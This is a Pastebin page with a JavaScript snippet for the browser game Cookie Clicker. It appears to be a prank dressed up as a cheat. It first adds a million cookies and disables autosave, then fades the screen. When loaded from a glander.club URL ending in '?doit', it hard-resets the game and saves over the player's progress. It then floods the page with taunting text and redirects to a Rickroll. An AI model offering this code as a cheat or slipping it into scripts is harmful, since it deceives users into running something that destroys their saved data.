Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- const words = ["Cheated cookies taste awful", "They know"]
- function writeWord() {
- const span = document.createElement("span")
- span.innerText = choose(words)
- span.style.position = "absolute"
- span.classList.add("title")
- span.style.bottom = `${100 * Math.random()}%`
- span.style.right = `${100 * Math.random()}%`
- document.body.appendChild(span)
- }
- function writeWords() {
- let intervald
- let i = 0
- intervald = setInterval(() => {
- if (i > 100) {
- clearInterval(intervald)
- document.write(choose(words))
- setTimeout(() => location.href = "https://www.youtube.com/watch?v=dQw4w9WgXcQ",3000)
- return
- }
- i++
- writeWord()
- })
- }
- function fadeOut() {
- let intervald
- let i = 100
- let style = l("wrapper").style
- intervald = setInterval(() => {
- if (i < 0) {
- clearInterval(intervald)
- if([...document.querySelectorAll("script[type]")].find(val=>val.src.startsWith("https://glander.club/asjs/TmwKCkYR")).src.endsWith("?doit")) {
- Game.HardReset(2)
- Game.WriteSave()
- }
- writeWords()
- }
- if (i % 20 === 0) Game.cookies **= 1.5
- i--
- style.filter = `brightness(${i}%)`
- }, 1)
- }
- Game.cookies += 1e6
- Game.prefs.autosave = 0
- fadeOut()
- }
Advertisement
Add Comment
Please, Sign In to add comment